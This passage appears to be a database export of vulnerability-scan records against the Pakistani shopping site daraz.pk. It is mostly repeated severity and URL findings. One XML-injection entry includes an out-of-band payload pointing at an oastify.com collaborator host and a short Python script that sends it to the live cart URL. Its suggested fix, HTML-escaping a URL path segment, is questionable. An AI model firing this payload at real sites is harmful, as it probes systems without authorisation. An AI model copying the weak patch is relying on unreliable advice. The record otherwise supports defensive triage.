(Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/ [URL path folder 3]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/ [URL path folder 3]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/ [URL path folder 4]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/ [URL path folder 4]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/ [URL path folder 5]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/ [URL path folder 5]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/ [URL path folder 6]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/ [URL path folder 6]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 2]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 2]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 3]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 3]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 4]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 4]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 6]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 6]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 7]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 7]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-live/ [Referer HTTP header]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-live/ [URL path folder 2]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-live/ [URL path folder 2]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-live/ [URL path folder 6]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-live/ [URL path folder 6]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-live/ [URL path folder 7]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-live/ [URL path folder 7]" }, { "vulnerability": "XML injection", "category": "injection", "exploit_steps": "## Reconnaissance\\n1. Identified the target endpoint: `https://www.daraz.pk/cart/`\\n2. Observed that the application accepts user-controlled input in URL path segments.\\n\\n## Vulnerability Confirmation\\n1. Submitted a test payload containing XML metacharacters to the URL path folder parameter.\\n2. Used the payload:\\n```xml\\n<frd xmlns=\\\"http://a.b/\\\" xmlns:xsi=\\\"http://www.w3.org/2001/XMLSchema-instance\\\" xsi:schemaLocation=\\\"http://a.b/ http://nri9jj4bzufvdb9cmcg9ytfmedk783w3k07qvf.oastify.com/frd.xsd\\\">frd</frd>\\n```\\n3. Detected interaction with the external domain (`oastify.com`), confirming that the server processes injected XML.\\n\\n## Exploitation Steps\\n1. Crafted malicious XML content referencing an attacker-controlled schema location.\\n2. Injected the payload via the vulnerable URL path segment.\\n3. Monitored for out-of-band interactions on the external domain to confirm successful injection.\\n4. Confirmed that the backend XML parser executed the injected content without proper sanitization.\\n\\n## Impact\\nThe vulnerability allows attackers to manipulate backend XML processing logic, potentially leading to unauthorized data access, service disruption, or further injection-based attacks like XXE.", "exploit_code": "import requests\\n\\ntarget_url = \\\"https://www.daraz.pk/cart/\\\"\\nmalicious_payload = \\\"<frd xmlns=\\\\\\\"http://a.b/\\\\\\\" xmlns:xsi=\\\\\\\"http://www.w3.org/2001/XMLSchema-instance\\\\\\\" xsi:schemaLocation=\\\\\\\"http://a.b/ http://nri9jj4bzufvdb9cmcg9ytfmedk783w3k07qvf.oastify.com/frd.xsd\\\\\\\">frd</frd>\\\"\\n\\n# Send request with XML injection payload\\nresponse = requests.get(target_url + malicious_payload)\\nprint(f\\\"Status Code: {response.status_code}\\\")\\nprint(f\\\"Response Length: {len(response.text)}\\\")", "patch_code": "## Root Cause\\nThe application incorporates unsanitized user input directly into XML documents or messages processed by the backend. Specifically, the URL path segment is used without validation or encoding, allowing attackers to inject arbitrary XML structures.\\n\\n## Before / After Fix\\n### Before\\n```python\\nurl_segment = user_input # Direct usage of untrusted input\\nrequests.get(f\\\"https://www.daraz.pk/cart/{url_segment}\\\")\\n```\\n\\n### After\\n```python\\nimport html\\nurl_segment = html.escape(user_input) # Encode special XML characters\\nrequests.get(f\\\"https://www.daraz.pk/cart/{url_segment}\\\")\\n```\\n\\n## Defense-in-Depth Checklist\\n- [ ] Validate all inputs against strict allowlists.\\n- [ ] Sanitize special characters (<, >, &, \\\" , ') using entity encoding.\\n- [ ] Disable external entity resolution in XML parsers.\\n- [ ] Use secure XML parsing libraries with built-in protections.\\n- [ ] Implement WAF rules to detect XML metacharacter patterns.\\n\\n## Verification Steps\\n1. Re-submit the original XML injection payload.\\n2. Confirm that the payload is either rejected or safely encoded.\\n3. Monitor logs for blocked or sanitized input attempts.\\n4. Perform regression testing to ensure functionality remains intact.", "context": "Severity: Medium (Certain)\nURL: https://www.daraz.pk/cart/ [URL path folder 1]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/catalog/ [URL path folder 1]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/checkout/ [URL path folder 1]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/customer/ [URL path folder 1]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/robots.txt [URL path filename]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/wangpu/ [URL path folder 1]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/wow/gcp/ [URL path folder 2]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 2]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 3]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 4]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 5]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 7]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/ [URL path folder 3]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/ [URL path folder 4]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/ [URL path folder 5]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/ [URL path folder 6]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 2]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 3]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 4]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 6]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 7]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-live/ [URL path folder 2]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-live/ [URL path folder 6]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-live/ [URL path folder 7]" } ], "_id": "69e8bebe59a6632dae07de0d" }

Rename Collection

Tools

Export Standard

Export --jsonArray

Import --mongoexport json

Collection Stats

Documents	25
Total doc size	672.42 KB
Average doc size	26.9 KB
Pre-allocated size	504 KB
Indexes	1
Total index size	36 KB
Padding factor
Extents

Indexes

Name	Columns	Size	Attributes	Actions
_id_	_id ASC	36 KB		DEL